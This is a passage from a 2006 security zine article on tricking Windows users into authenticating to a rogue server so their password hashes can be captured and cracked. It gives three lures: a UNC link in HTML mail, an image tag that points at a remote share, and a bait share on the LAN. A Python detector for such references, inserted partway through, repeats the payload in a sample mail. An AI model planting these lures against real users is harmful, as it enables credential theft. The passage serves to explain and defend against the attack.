Uninformed: Informative Information for the Uninformed

Vol 3 » 2006.Jan


How to get the victim to log into the rogue server?

The big question to answer is how one can get the victim to log into the rogue server, thus exposing his username and password hash for the attacker to break.

Approach #1: Sending an HTML mail that includes a link in the form of a UNC path should do the trick, depending primarily on the sender's rhetorical ability in getting his victim to click the link, and on the mail client understanding what it's expected to do. A UNC path is usually of the form \\192.168.7.6\share, where the IP address obviously specifies the host to connect to, and "share" is a shared resource on that host. Due to Microsoft always being concerned about comfort first, the following will happen once the victim clicks the link on a Windows machine. The OS will try to log into the specified resource. When asked for a username and password, the client happily provides the current user's username and his hashed password to the server in an effort to log in with these credentials. No user interaction required. No joke.

Approach #2: Getting the victim to visit, with Internet Explorer, a site that includes a UNC path has the same result.
An image tag like <img src="\\192.168.7.6\ble.jpg"> will do the trick. IE will make Windows try to log into the resource in order to get the image. Again, no user interaction is required. This trick does not work with Mozilla Firefox, by the way.
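A defensive check for the lures described in approaches #1 and #2, added here as an example and not part of the original article: it scans an HTML mail body or web page for link and image attributes that point at a remote share (a UNC path, or a file:// URL that names a host), which is exactly what would make a Windows client volunteer the user's credentials. The sample message is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes whose value a mail client or browser will fetch or follow.
URL_ATTRS = {"src", "href", "background", "data", "poster"}


def is_remote_share_ref(value):
    """True if the value would make a Windows client open a remote share
    (and therefore attempt to authenticate to that host)."""
    v = value.strip()
    if v.startswith("\\\\"):             # plain UNC path: \\host\share\...
        return True
    parts = urlsplit(v)
    if parts.scheme.lower() != "file":
        return False
    # file://host/share/... names a host; file:///C:/... is a local path
    return bool(parts.netloc) or parts.path.startswith("\\\\")


class RemoteShareFinder(HTMLParser):
    """Collects (tag, attribute, value) for every reference to a remote share."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names and unescapes entities in values
        for name, value in attrs:
            if value is not None and name in URL_ATTRS and is_remote_share_ref(value):
                self.findings.append((tag, name, value))


def find_remote_share_refs(html):
    """Return every (tag, attribute, value) in the HTML that references a remote share."""
    finder = RemoteShareFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample mail body: one benign link, one UNC image, one file:// link
# with a host, and one local file:// image that must not be flagged.
SAMPLE_MAIL = (
    '<html><body><p>See the <a href="https://example.com/report">report</a>.</p>'
    '<img src="\\\\192.168.7.6\\ble.jpg">'
    '<a href="file://192.168.7.6/share/q4.doc">Q4 numbers</a>'
    '<img src="file:///C:/Users/Public/logo.png"></body></html>'
)

if __name__ == "__main__":
    for tag, attr, value in find_remote_share_refs(SAMPLE_MAIL):
        print(f"<{tag} {attr}> points at a remote share: {value}")
```

Run on the sample, it flags the UNC image and the file:// link with a host and ignores the HTTPS link and the local file:// path; the same check works on any HTML body pulled from a mail gateway or proxy.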

Approach #3: If the rogue server is part of the LAN, advertising it in the network neighbourhood as a "warez, porn, mp3, movie" server should result in users trying to log into it sooner or later. There's no way anyone can withstand the power of the 4 elements!

There are plenty of other ways, which the author leaves to the reader's imagination.